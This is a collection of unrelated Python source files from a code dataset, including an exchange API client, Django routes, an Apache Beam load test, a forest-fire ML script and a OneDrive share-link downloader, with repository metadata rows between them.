>>> user_info = turicreate.SFrame({'user_id': ["0", "1", "2"],
... 'name': ["Alice", "Bob", "Charlie"],
... 'numeric_feature': [0.1, 12, 22]})
>>> item_info = turicreate.SFrame({'item_id': ["a", "b", "c", "d"],
... 'name': ["item1", "item2", "item3", "item4"],
... 'dict_feature': [{'a' : 23}, {'a' : 13},
... {'b' : 1},
... {'a' : 23, 'b' : 32}]})
>>> m2 = turicreate.ranking_factorization_recommender.create(sf,
... target='rating',
... user_data=user_info,
... item_data=item_info)
**Optimizing for ranking performance**
Create a model that pushes predicted ratings of unobserved user-item
pairs toward 1 or below.
>>> m3 = turicreate.ranking_factorization_recommender.create(sf,
... target='rating',
... ranking_regularization = 0.1,
... unobserved_rating_value = 1)
"""
def __init__(self, model_proxy):
'''__init__(self)'''
self.__proxy__ = model_proxy
@classmethod
def _native_name(cls):
return "ranking_factorization_recommender"
| 46.229242 | 105 | 0.640233 |
a5c6bf8b12b083488ccb5fddf9ee20aeaf816653 | 3,918 | py | Python | copilot/events/api_models.py | febsn/djangocms-copilot | e4b268ad522d972333b037ef8a1c317cc537da9e | [
"MIT"
] | null | null | null | copilot/events/api_models.py | febsn/djangocms-copilot | e4b268ad522d972333b037ef8a1c317cc537da9e | [
"MIT"
] | null | null | null | copilot/events/api_models.py | febsn/djangocms-copilot | e4b268ad522d972333b037ef8a1c317cc537da9e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime, date
from copilot.conf import settings
from copilot.api import CopilotClient
from copilot.base_api_models import BaseApiManager
class EventManager(BaseApiManager):
ALL_ENDPOINT = 'events/'
ARTIST_ENDPOINT = 'artists/{id}/events/'
SORTING = 'dateOfEvent,asc'
FROM = 'from/{}/'
ARTIST_FROM = '{}/'
TO = 'to/{}/'
ARTIST_TO = '{}/'
def _get_from(self):
if self.artist_id:
return self.ARTIST_FROM
else:
return self.FROM
def _get_to(self):
if self.artist_id:
return self.ARTIST_TO
else:
return self.TO
def _get_endpoint(self, **kwargs):
endpoint = super(EventManager, self)._get_endpoint(**kwargs)
try:
start_date = kwargs['start_date']
endpoint += self._get_from().format(start_date.isoformat())
# the API allows only calls with start_date AND end_date, or neither of them.
# If there is only start_date given, we assume a delta of one year.
endpoint += self._get_to().format(
kwargs.get('end_date', date(start_date.year+1, start_date.month, start_date.day)).isoformat()
)
except KeyError:
# no problem if start_date and end_date not given
pass
return endpoint
def _get(self, endpoint, **kwargs):
kwargs['external'] = False
events = super(EventManager, self)._get(endpoint, **kwargs)
events['artists'] = {}
for event in events['content']:
try:
event['dateOfEvent'] = datetime.strptime(event['dateOfEvent']+event['start'], '%Y-%m-%d%H:%M:%S.%f')
except KeyError:
try:
event['dateOfEvent'] = datetime.strptime(event['dateOfEvent'], '%Y-%m-%d')
except KeyError:
pass
for cast_item in event['cast']:
try:
events['artists'][cast_item['artist']['id']]['events'].append(event)
except KeyError:
events['artists'][cast_item['artist']['id']] = {
'artist': cast_item['artist'],
'events': [event, ]
}
return events
def _get_years(self):
endpoint = self._get_endpoint()
events = self._get(endpoint)
years = {}
        # self._get() returns a dict whose parsed events live under 'content'
        for event in events['content']:
try:
years[event['dateOfEvent'].year].append(event)
except KeyError:
years[event['dateOfEvent'].year] = [event, ]
return years
def year(self, year=None):
"""
Return events for year `year`.
"""
if year is None:
year = datetime.now().year
endpoint = self._get_endpoint(
start_date=date(year, 1, 1),
end_date=date(year, 12, 31)
)
return self._get(endpoint)
def prevnext(self, year=None):
"""
Return events for year `year` and one year before and after.
"""
if year is None:
year = datetime.now().year
endpoint = self._get_endpoint(
start_date=date(year-1, 1, 1),
end_date=date(year+1, 12, 31)
)
return self._get(endpoint)
@property
def years(self):
try:
return self._years
except AttributeError:
self._years = self._get_years()
return self._years
def upcoming(self, **kwargs):
endpoint = self._get_endpoint(
start_date=datetime.now().date())
return self._get(endpoint, **kwargs)
def __str__(self):
if self.artist_id:
return 'EventManager for {}'.format(self.artist_id)
else:
return 'EventManager'
| 31.596774 | 116 | 0.545942 |
658ef5156c6bc6fe60a06664d23eead8bb8a47b5 | 1,214 | py | Python | api/mfwgallery/urls-dev.py | ankkamies/mfwgallery-api | c03d20b24fd4ef5d3e9be173b917eea493a5c3d6 | [
"MIT"
] | null | null | null | api/mfwgallery/urls-dev.py | ankkamies/mfwgallery-api | c03d20b24fd4ef5d3e9be173b917eea493a5c3d6 | [
"MIT"
] | null | null | null | api/mfwgallery/urls-dev.py | ankkamies/mfwgallery-api | c03d20b24fd4ef5d3e9be173b917eea493a5c3d6 | [
"MIT"
] | null | null | null | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from mfwgallery import settings
from rest_framework.routers import SimpleRouter
from rest_framework_nested import routers
from posts import views
# Initialize routes
router = routers.SimpleRouter()
router.register(r'posts', views.PostViewSet)
router.register(r'tags', views.TagViewSet)
router.register(r'users', views.UserViewSet)
router.register(r'images', views.ImageViewSet)
# Initialize nested routes
users_router = routers.NestedSimpleRouter(router, r'users', lookup='user')
users_router.register(r'posts', views.UserPostViewSet)
posts_router = routers.NestedSimpleRouter(router, r'posts', lookup='post')
posts_router.register(r'comments', views.CommentViewSet)
posts_router.register(r'tags', views.PostTagViewSet)
# Create URL patterns
urlpatterns = patterns('',
url(r'^api/', include(router.urls)),
url(r'^api/', include(posts_router.urls)),
url(r'^api/', include(users_router.urls)),
url(r'^api/auth/login/$', views.LoginView.as_view()),
url(r'^api/auth/register/$', views.RegisterView.as_view()),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 35.705882 | 74 | 0.76112 |
371f52e69d239065ca75793860fd46c1cbdfb669 | 5,426 | py | Python | sdks/python/apache_beam/testing/load_tests/combine_test.py | a-satyateja/beam | 30a04b912979adf5f316cc8ace334d921ca71838 | [
"Apache-2.0"
] | 2 | 2019-06-03T02:47:29.000Z | 2019-06-12T21:22:41.000Z | sdks/python/apache_beam/testing/load_tests/combine_test.py | a-satyateja/beam | 30a04b912979adf5f316cc8ace334d921ca71838 | [
"Apache-2.0"
] | 7 | 2020-01-28T22:46:48.000Z | 2022-02-10T00:10:51.000Z | sdks/python/apache_beam/testing/load_tests/combine_test.py | a-satyateja/beam | 30a04b912979adf5f316cc8ace334d921ca71838 | [
"Apache-2.0"
] | 6 | 2019-06-02T16:18:52.000Z | 2020-11-04T04:17:08.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This is Combine load test with Synthetic Source. Besides of the standard
input options there are additional options:
* fanout (optional) - number of GBK operations to run in parallel
* project (optional) - the gcp project in case of saving
metrics in Big Query (in case of Dataflow Runner
it is required to specify project of runner),
* publish_to_big_query - if metrics should be published in big query,
* metrics_namespace (optional) - name of BigQuery dataset where metrics
will be stored,
* metrics_table (optional) - name of BigQuery table where metrics
will be stored,
* input_options - options for Synthetic Sources.
Example test run on DirectRunner:
python setup.py nosetests \
--test-pipeline-options="
--project=big-query-project
--publish_to_big_query=true
--metrics_dataset=python_load_tests
--metrics_table=combine
--fanout=1
--input_options='{
\"num_records\": 300,
\"key_size\": 5,
\"value_size\":15,
\"bundle_size_distribution_type\": \"const\",
\"bundle_size_distribution_param\": 1,
\"force_initial_num_bundles\": 0
}'" \
--tests apache_beam.testing.load_tests.combine_test
or:
./gradlew -PloadTest.args='
--publish_to_big_query=true
--project=...
--metrics_dataset=python_load_test
--metrics_table=combine
--input_options=\'
{"num_records": 1,
"key_size": 1,
"value_size":1,
"bundle_size_distribution_type": "const",
"bundle_size_distribution_param": 1,
"force_initial_num_bundles": 1}\'
--runner=DirectRunner
--fanout=1' \
-PloadTest.mainClass=apache_beam.testing.load_tests.combine_test \
-Prunner=DirectRunner :sdks:python:apache_beam:testing:load-tests:run
To run test on other runner (ex. Dataflow):
python setup.py nosetests \
--test-pipeline-options="
--runner=TestDataflowRunner
--fanout=1
--project=...
--staging_location=gs://...
--temp_location=gs://...
--sdk_location=./dist/apache-beam-x.x.x.dev0.tar.gz
--publish_to_big_query=true
--metrics_dataset=python_load_tests
--metrics_table=combine
--input_options='{
\"num_records\": 1000,
\"key_size\": 5,
\"value_size\":15,
\"bundle_size_distribution_type\": \"const\",
\"bundle_size_distribution_param\": 1,
\"force_initial_num_bundles\": 0
}'" \
--tests apache_beam.testing.load_tests.combine_test
or:
./gradlew -PloadTest.args='
--publish_to_big_query=true
--project=...
--metrics_dataset=python_load_tests
--metrics_table=combine
--temp_location=gs://...
--input_options=\'
{"num_records": 1,
"key_size": 1,
"value_size":1,
"bundle_size_distribution_type": "const",
"bundle_size_distribution_param": 1,
"force_initial_num_bundles": 1}\'
--runner=TestDataflowRunner
--fanout=1' \
-PloadTest.mainClass=
apache_beam.testing.load_tests.combine_test \
-Prunner=
TestDataflowRunner :sdks:python:apache_beam:testing:load-tests:run
"""
from __future__ import absolute_import
import logging
import os
import unittest
import apache_beam as beam
from apache_beam.testing import synthetic_pipeline
from apache_beam.testing.load_tests.load_test import LoadTest
from apache_beam.testing.load_tests.load_test_metrics_utils import MeasureTime
load_test_enabled = False
if os.environ.get('LOAD_TEST_ENABLED') == 'true':
load_test_enabled = True
@unittest.skipIf(not load_test_enabled, 'Enabled only for phrase triggering.')
class CombineTest(LoadTest):
def setUp(self):
super(CombineTest, self).setUp()
self.fanout = self.pipeline.get_option('fanout')
if self.fanout is None:
self.fanout = 1
else:
self.fanout = int(self.fanout)
class _GetElement(beam.DoFn):
def process(self, element):
yield element
def testCombineGlobally(self):
input = (self.pipeline
| beam.io.Read(synthetic_pipeline.SyntheticSource(
self.parseTestPipelineOptions()))
| 'Measure time: Start' >> beam.ParDo(
MeasureTime(self.metrics_namespace))
)
for branch in range(self.fanout):
# pylint: disable=expression-not-assigned
(input
| 'Combine with Top %i' % branch >> beam.CombineGlobally(
beam.combiners.TopCombineFn(1000))
| 'Consume %i' % branch >> beam.ParDo(self._GetElement())
| 'Measure time: End %i' % branch >> beam.ParDo(
MeasureTime(self.metrics_namespace))
)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| 32.491018 | 78 | 0.697383 |
a28ce3c76b96b4f00e948f99fed3718c672500f0 | 3,388 | py | Python | training.py | Utkarsh-Shakya/Capstone_Project | ac9b85e9b50f7f15a3ab6dc6d98539b3763e6536 | [
"MIT"
] | null | null | null | training.py | Utkarsh-Shakya/Capstone_Project | ac9b85e9b50f7f15a3ab6dc6d98539b3763e6536 | [
"MIT"
] | null | null | null | training.py | Utkarsh-Shakya/Capstone_Project | ac9b85e9b50f7f15a3ab6dc6d98539b3763e6536 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
#Importing required libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# In[ ]:
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
# In[ ]:
#For ignoring warnings
import warnings
warnings.filterwarnings(action='ignore')
# # Data Pre-processing
# In[ ]:
#Reading the dataset
df=pd.read_csv('forestfires.csv')
# In[ ]:
#Function for pre-processing data according to regression or classification
def preprocessing(df, task="regression"):
    #Reload the raw CSV so every call starts from the original string-valued month/day columns
    df=pd.read_csv('forestfires.csv')
#Converting String values of month and day into Integer
month = {'jan':1, 'feb':2, 'mar':3, 'apr':4, 'may':5, 'jun':6, 'jul':7, 'aug':8, 'sep':9, 'oct':10, 'nov':11, 'dec':12,}
df['month'] = df['month'].map(month)
day = {'sun':1, 'mon':2, 'tue':3, 'wed':4, 'thu':5, 'fri':6, 'sat':7,}
df['day'] = df['day'].map(day)
#Converting target feature according to training model used
if(task=="regression"):
#Using Log Transformation to reduce skewness of the target feature
df['area']=np.log(df['area']+1)
X = df.drop(["area"], axis=1)
y = df['area']
#If model is classification, then converting area burnt into 1(if it is greater than 0) else 0
elif(task=="classification"):
X = df.drop("area", axis=1)
y = df['area'].apply(lambda x:1 if x>0 else 0)
#If model is clustering, then storing values of two most important input features(DMC and temp)
elif(task=="clustering"):
X = df.iloc[1:500, [5,8]].values
y= None
else:
raise Exception("Enter regression, classification or clustering")
#Scaling the input features
scaler=StandardScaler()
scaler.fit(X)
if(task=="regression" or task=="classification"):
X=pd.DataFrame(scaler.transform(X), columns=X.columns)
return X, y
# # Training the model
# In[ ]:
#Defining model training functions for regression and classification
def supervised_method(X,y, task="regression"):
X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.7, shuffle=True, random_state=1)
if (task=="regression"):
model=LinearRegression()
model.fit(X_train,y_train)
elif (task=="classification"):
model=LogisticRegression()
model.fit(X_train,y_train)
else:
raise Exception("Enter regression or classification")
return model
# In[70]:
#Defining model training functions for clustering
def unsupervised_method(X):
model = KMeans(n_clusters=4, init='random', random_state=0)
y_km = model.fit_predict(X)
plt.scatter(X[y_km==0,0],X[y_km==0,1],s=20,c='green',marker='x',label='Very low Fire')
plt.scatter(X[y_km==1,0],X[y_km==1,1],s=20,c='orange',marker='x',label='Low Fire')
plt.scatter(X[y_km==2,0],X[y_km==2,1],s=20,c='blue',marker='x',label='Medium Fire')
plt.scatter(X[y_km==3,0],X[y_km==3,1],s=20,c='black',marker='x',label='High Fire')
plt.scatter(model.cluster_centers_[:,0],model.cluster_centers_[:,1],s=250,marker='*',c='red',label='centroids')
plt.legend()
plt.xlabel('DMC')
plt.ylabel('Temp')
plt.grid()
plt.show()
return model
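# In[ ]:
#Example driver (a sketch): ties the helpers above together; it assumes
#forestfires.csv sits in the working directory, which the module already requires at import time
if __name__=="__main__":
    X_reg, y_reg = preprocessing(df, task="regression")
    reg_model = supervised_method(X_reg, y_reg, task="regression")
    X_clf, y_clf = preprocessing(df, task="classification")
    clf_model = supervised_method(X_clf, y_clf, task="classification")
    X_clu, _ = preprocessing(df, task="clustering")
    km_model = unsupervised_method(X_clu)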
| 26.677165 | 124 | 0.655549 |
70a893143160b49be182df7c4eb9ac945bd79def | 399 | py | Python | postfixadmin/postfixadmin/wsgi.py | fretscha/django-postfix-admin | 0474370fdd837ab34c8bf6ef03e02b66a54f3119 | [
"MIT"
] | 1 | 2015-01-24T13:29:58.000Z | 2015-01-24T13:29:58.000Z | postfixadmin/postfixadmin/wsgi.py | fretscha/django-postfix-admin | 0474370fdd837ab34c8bf6ef03e02b66a54f3119 | [
"MIT"
] | null | null | null | postfixadmin/postfixadmin/wsgi.py | fretscha/django-postfix-admin | 0474370fdd837ab34c8bf6ef03e02b66a54f3119 | [
"MIT"
] | 3 | 2015-01-25T19:48:31.000Z | 2021-01-08T20:49:50.000Z | """
WSGI config for postfixadmin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "postfixadmin.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
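# Local-inspection sketch only: a production deployment would point a real
# WSGI server (gunicorn, uWSGI, mod_wsgi, ...) at ``application`` instead.
if __name__ == "__main__":
    from wsgiref.simple_server import make_server
    make_server("127.0.0.1", 8000, application).serve_forever()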
| 26.6 | 78 | 0.796992 |
552155a5f9d277c63da557d30cfee54197f2b773 | 12,557 | py | Python | anyex/xbtce.py | ttwishing/anyex | cfd1f2f04ab992b790add4843aafff91e5773cbf | [
"MIT"
] | null | null | null | anyex/xbtce.py | ttwishing/anyex | cfd1f2f04ab992b790add4843aafff91e5773cbf | [
"MIT"
] | null | null | null | anyex/xbtce.py | ttwishing/anyex | cfd1f2f04ab992b790add4843aafff91e5773cbf | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/anyex/anyex/blob/master/CONTRIBUTING.md#how-to-contribute-code
from anyex.base.exchange import Exchange
import hashlib
from anyex.base.errors import ExchangeError
from anyex.base.errors import NotSupported
from anyex.base.errors import AuthenticationError
class xbtce (Exchange):
def describe(self):
return self.deep_extend(super(xbtce, self).describe(), {
'id': 'xbtce',
'name': 'xBTCe',
'countries': 'RU',
'rateLimit': 2000, # responses are cached every 2 seconds
'version': 'v1',
'has': {
'publicAPI': False,
'CORS': False,
'fetchTickers': True,
'createMarketOrder': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28059414-e235970c-662c-11e7-8c3a-08e31f78684b.jpg',
'api': 'https://cryptottlivewebapi.xbtce.net:8443/api',
'www': 'https://www.xbtce.com',
'doc': [
'https://www.xbtce.com/tradeapi',
'https://support.xbtce.info/Knowledgebase/Article/View/52/25/xbtce-exchange-api',
],
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'get': [
'currency',
'currency/{filter}',
'level2',
'level2/{filter}',
'quotehistory/{symbol}/{periodicity}/bars/ask',
'quotehistory/{symbol}/{periodicity}/bars/bid',
'quotehistory/{symbol}/level2',
'quotehistory/{symbol}/ticks',
'symbol',
'symbol/{filter}',
'tick',
'tick/{filter}',
'ticker',
'ticker/{filter}',
'tradesession',
],
},
'private': {
'get': [
'tradeserverinfo',
'tradesession',
'currency',
'currency/{filter}',
'level2',
'level2/{filter}',
'symbol',
'symbol/{filter}',
'tick',
'tick/{filter}',
'account',
'asset',
'asset/{id}',
'position',
'position/{id}',
'trade',
'trade/{id}',
'quotehistory/{symbol}/{periodicity}/bars/ask',
'quotehistory/{symbol}/{periodicity}/bars/ask/info',
'quotehistory/{symbol}/{periodicity}/bars/bid',
'quotehistory/{symbol}/{periodicity}/bars/bid/info',
'quotehistory/{symbol}/level2',
'quotehistory/{symbol}/level2/info',
'quotehistory/{symbol}/periodicities',
'quotehistory/{symbol}/ticks',
'quotehistory/{symbol}/ticks/info',
'quotehistory/cache/{symbol}/{periodicity}/bars/ask',
'quotehistory/cache/{symbol}/{periodicity}/bars/bid',
'quotehistory/cache/{symbol}/level2',
'quotehistory/cache/{symbol}/ticks',
'quotehistory/symbols',
'quotehistory/version',
],
'post': [
'trade',
'tradehistory',
],
'put': [
'trade',
],
'delete': [
'trade',
],
},
},
})
def fetch_markets(self):
markets = self.privateGetSymbol()
result = []
for p in range(0, len(markets)):
market = markets[p]
id = market['Symbol']
base = market['MarginCurrency']
quote = market['ProfitCurrency']
if base == 'DSH':
base = 'DASH'
symbol = base + '/' + quote
symbol = symbol if market['IsTradeAllowed'] else id
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
balances = self.privateGetAsset()
result = {'info': balances}
for b in range(0, len(balances)):
balance = balances[b]
currency = balance['Currency']
uppercase = currency.upper()
# xbtce names DASH incorrectly as DSH
if uppercase == 'DSH':
uppercase = 'DASH'
account = {
'free': balance['FreeAmount'],
'used': balance['LockedAmount'],
'total': balance['Amount'],
}
result[uppercase] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
orderbook = self.privateGetLevel2Filter(self.extend({
'filter': market['id'],
}, params))
orderbook = orderbook[0]
timestamp = orderbook['Timestamp']
return self.parse_order_book(orderbook, timestamp, 'Bids', 'Asks', 'Price', 'Volume')
def parse_ticker(self, ticker, market=None):
timestamp = 0
last = None
if 'LastBuyTimestamp' in ticker:
if timestamp < ticker['LastBuyTimestamp']:
timestamp = ticker['LastBuyTimestamp']
last = ticker['LastBuyPrice']
if 'LastSellTimestamp' in ticker:
if timestamp < ticker['LastSellTimestamp']:
timestamp = ticker['LastSellTimestamp']
last = ticker['LastSellPrice']
if not timestamp:
timestamp = self.milliseconds()
symbol = None
if market:
symbol = market['symbol']
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': ticker['DailyBestBuyPrice'],
'low': ticker['DailyBestSellPrice'],
'bid': ticker['BestBid'],
'bidVolume': None,
'ask': ticker['BestAsk'],
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': ticker['DailyTradedTotalVolume'],
'quoteVolume': None,
'info': ticker,
}
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
tickers = self.publicGetTicker(params)
tickers = self.index_by(tickers, 'Symbol')
ids = list(tickers.keys())
result = {}
for i in range(0, len(ids)):
id = ids[i]
market = None
symbol = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
symbol = market['symbol']
else:
base = id[0:3]
quote = id[3:6]
if base == 'DSH':
base = 'DASH'
if quote == 'DSH':
quote = 'DASH'
symbol = base + '/' + quote
ticker = tickers[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
tickers = self.publicGetTickerFilter(self.extend({
'filter': market['id'],
}, params))
length = len(tickers)
if length < 1:
raise ExchangeError(self.id + ' fetchTicker returned empty response, xBTCe public API error')
tickers = self.index_by(tickers, 'Symbol')
ticker = tickers[market['id']]
return self.parse_ticker(ticker, market)
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
# no method for trades?
return self.privateGetTrade(params)
def parse_ohlcv(self, ohlcv, market=None, timeframe='1m', since=None, limit=None):
return [
ohlcv['Timestamp'],
ohlcv['Open'],
ohlcv['High'],
ohlcv['Low'],
ohlcv['Close'],
ohlcv['Volume'],
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
# minutes = int(timeframe / 60) # 1 minute by default
# periodicity = str(minutes)
# self.load_markets()
# market = self.market(symbol)
# if not since:
        #     since = self.seconds() - 86400 * 7 # last week by default
# if not limit:
# limit = 1000 # default
# response = self.privateGetQuotehistorySymbolPeriodicityBarsBid(self.extend({
# 'symbol': market['id'],
# 'periodicity': periodicity,
# 'timestamp': since,
# 'count': limit,
# }, params))
# return self.parse_ohlcvs(response['Bars'], market, timeframe, since, limit)
raise NotSupported(self.id + ' fetchOHLCV is disabled by the exchange')
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
if type == 'market':
raise ExchangeError(self.id + ' allows limit orders only')
response = self.privatePostTrade(self.extend({
'pair': self.market_id(symbol),
'type': side,
'amount': amount,
'rate': price,
}, params))
return {
'info': response,
'id': str(response['Id']),
}
def cancel_order(self, id, symbol=None, params={}):
return self.privateDeleteTrade(self.extend({
'Type': 'Cancel',
'Id': id,
}, params))
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
if not self.apiKey:
raise AuthenticationError(self.id + ' requires apiKey for all requests, their public API is always busy')
if not self.uid:
raise AuthenticationError(self.id + ' requires uid property for authentication and trading, their public API is always busy')
url = self.urls['api'] + '/' + self.version
if api == 'public':
url += '/' + api
url += '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
else:
self.check_required_credentials()
headers = {'Accept-Encoding': 'gzip, deflate'}
nonce = str(self.nonce())
if method == 'POST':
if query:
headers['Content-Type'] = 'application/json'
body = self.json(query)
else:
url += '?' + self.urlencode(query)
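            # The signature payload is nonce + uid + apiKey + HTTP method + full URL
            # (plus the JSON body, if any); it is HMAC-SHA256 signed below and sent
            # base64-encoded in the Authorization header.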
auth = nonce + self.uid + self.apiKey + method + url
if body:
auth += body
signature = self.hmac(self.encode(auth), self.encode(self.secret), hashlib.sha256, 'base64')
credentials = self.uid + ':' + self.apiKey + ':' + nonce + ':' + self.binary_to_string(signature)
headers['Authorization'] = 'HMAC ' + credentials
return {'url': url, 'method': method, 'body': body, 'headers': headers}
| 38.636923 | 137 | 0.474317 |
dfc02ccdbc69fc9f6304f50138076a131d580512 | 2,333 | py | Python | havepassword.py | weixiangnan/OneDriveShareLinkPushAria2 | a415959a5e39e93b6ce8d417b7ad500368f8dc15 | [
"Apache-2.0"
] | 1 | 2021-09-03T03:47:41.000Z | 2021-09-03T03:47:41.000Z | havepassword.py | weixiangnan/OneDriveShareLinkPushAria2 | a415959a5e39e93b6ce8d417b7ad500368f8dc15 | [
"Apache-2.0"
] | null | null | null | havepassword.py | weixiangnan/OneDriveShareLinkPushAria2 | a415959a5e39e93b6ce8d417b7ad500368f8dc15 | [
"Apache-2.0"
] | null | null | null | import os
import asyncio
from main import getFiles, downloadFiles, header
from pprint import pprint
OneDriveShareURL = "https://jia666-my.sharepoint.com/:f:/g/personal/1025_xkx_me/EsqNMFlDoyZKt-RGcsI1F2EB6AiQMBIpQM4Ka247KkyOQw?e=oC1y7r"
OneDriveSharePwd = "xkx"
aria2Link = "http://localhost:5800/jsonrpc"
aria2Secret = "123456"
isDownload = False
downloadNum = "1,2-4,5" # 1,2,3,4,5
os.environ['PYPPETEER_HOME'] = os.path.split(os.path.realpath(__file__))[0]
# os.environ['PYPPETEER_DOWNLOAD_HOST'] = "http://npm.taobao.org/mirrors"
from pyppeteer import launch
pheader = {}
url = ""
async def main(iurl, password):
global pheader, url
browser = await launch()
page = await browser.newPage()
await page.goto(iurl, {'waitUntil': 'networkidle0'})
await page.focus("input[id='txtPassword']")
await page.keyboard.type(password)
verityElem = await page.querySelector("input[id='btnSubmitPassword']")
print("密码输入完成,正在跳转")
await asyncio.gather(
page.waitForNavigation(),
verityElem.click(),
)
url = await page.evaluate('window.location.href', force_expr=True)
await page.screenshot({'path': 'example.png'})
print("正在获取Cookie")
# print(p.headers, p.url)
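    # Flatten the browser cookies into a single "name=value;..." string that can
    # later be sent as the Cookie header on OneDrive requests.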
_cookie = await page.cookies()
pheader = ""
for __cookie in _cookie:
coo = "{}={};".format(__cookie.get("name"), __cookie.get("value"))
pheader += coo
await browser.close()
def havePwdGetFiles(iurl, password):
global header
print("正在启动无头浏览器模拟输入密码")
asyncio.get_event_loop().run_until_complete(main(iurl, password))
print("无头浏览器关闭,正在获取文件列表")
print()
header['cookie'] = pheader
print(getFiles(url, None, 0))
def havePwdDownloadFiles(iurl, password, aria2URL, token, num=-1):
global header
print("正在启动无头浏览器模拟输入密码")
asyncio.get_event_loop().run_until_complete(main(iurl, password))
print("无头浏览器关闭,正在获取文件列表")
header['cookie'] = pheader
downloadFiles(url, None, 0, aria2URL, token, num=num)
if __name__ == "__main__":
if isDownload:
havePwdDownloadFiles(OneDriveShareURL, OneDriveSharePwd, aria2Link,
aria2Secret, num=downloadNum)
else:
havePwdGetFiles(OneDriveShareURL, OneDriveSharePwd)
| 30.298701 | 137 | 0.666952 |
99d2a3f3236264b7b98fe02443c3c249a71ae82d | 1,785 | py | Python | plugins/miscellaneous/misc_namer.py | almazboot/sketal | c36a415d2cf007cc85091a4637e8cda74ad88ca1 | [
"MIT"
] | 43 | 2017-10-29T11:05:47.000Z | 2018-09-25T19:05:13.000Z | plugins/miscellaneous/misc_namer.py | almazboot/sketal | c36a415d2cf007cc85091a4637e8cda74ad88ca1 | [
"MIT"
] | 38 | 2017-10-28T12:29:58.000Z | 2018-09-25T19:38:02.000Z | plugins/miscellaneous/misc_namer.py | almazboot/sketal | c36a415d2cf007cc85091a4637e8cda74ad88ca1 | [
"MIT"
] | 35 | 2017-10-30T05:35:28.000Z | 2018-10-01T10:45:41.000Z | from handler.base_plugin import CommandPlugin
from utils import Message
class NamerPlugin(CommandPlugin):
__slots__ = ("old_answer",)
def __init__(self, *commands, prefixes=None, strict=False):
"""Answers with information about bot. Requires: StoragePlugin."""
if not commands:
commands= ("зови меня",)
super().__init__(*commands, prefixes=prefixes, strict=strict)
self.description = [f"\"Зови меня\"",
f"Указывает, как бот будет обращаться к вам.",
f"{self.command_example()} [имя] - установить себе псевдоним.",
f"{self.command_example()} никак - удалить свой псевдоним."]
_answer = Message.answer
async def new_answer(self, message="", **kwargs):
if self.meta["data_user"] and "nickname" in self.meta["data_user"]:
message = self.meta["data_user"]["nickname"] + ",\n" + message
        # Class-body names are not visible from inside methods, so fetch the saved
        # original coroutine through the class attribute.
        return await NamerPlugin._answer(self, message, **kwargs)
Message.answer = new_answer
async def process_message(self, msg):
if not msg.meta["data_user"]:
return await msg.answer("👊 Нет нужного плагина для этого \_:c_/")
_, name = self.parse_message(msg, full=True)
fname = name.strip().lower()
if len(fname) > 64:
return await msg.answer("👊 Слишком длинное имя!")
if any(mat in fname for mat in ("член", "гей", "хуй", "пидор")):
return await msg.answer("👊 Нет.")
if not fname or fname == "никак":
if "nickname" in msg.meta["data_user"]:
del msg.meta["data_user"]["nickname"]
else:
msg.meta["data_user"]["nickname"] = name
return await msg.answer("💭 Хорошо")
| 36.428571 | 91 | 0.579272 |
53139cfad7edcacf26ce373fb36d0003c0a48156 | 1,594 | py | Python | elasticmodelspy/types.py | g20ready/ElasticModelsPy | 4222cd8586384650a66e39fb830d5bcd5f8d5831 | [
"MIT"
] | null | null | null | elasticmodelspy/types.py | g20ready/ElasticModelsPy | 4222cd8586384650a66e39fb830d5bcd5f8d5831 | [
"MIT"
] | null | null | null | elasticmodelspy/types.py | g20ready/ElasticModelsPy | 4222cd8586384650a66e39fb830d5bcd5f8d5831 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from elasticmodelspy.analysis.base import Serializable
# BaseAnalyzer is referenced by Text.__validate_analyzer below; the import path is
# assumed from the error message and may need adjusting to the package layout.
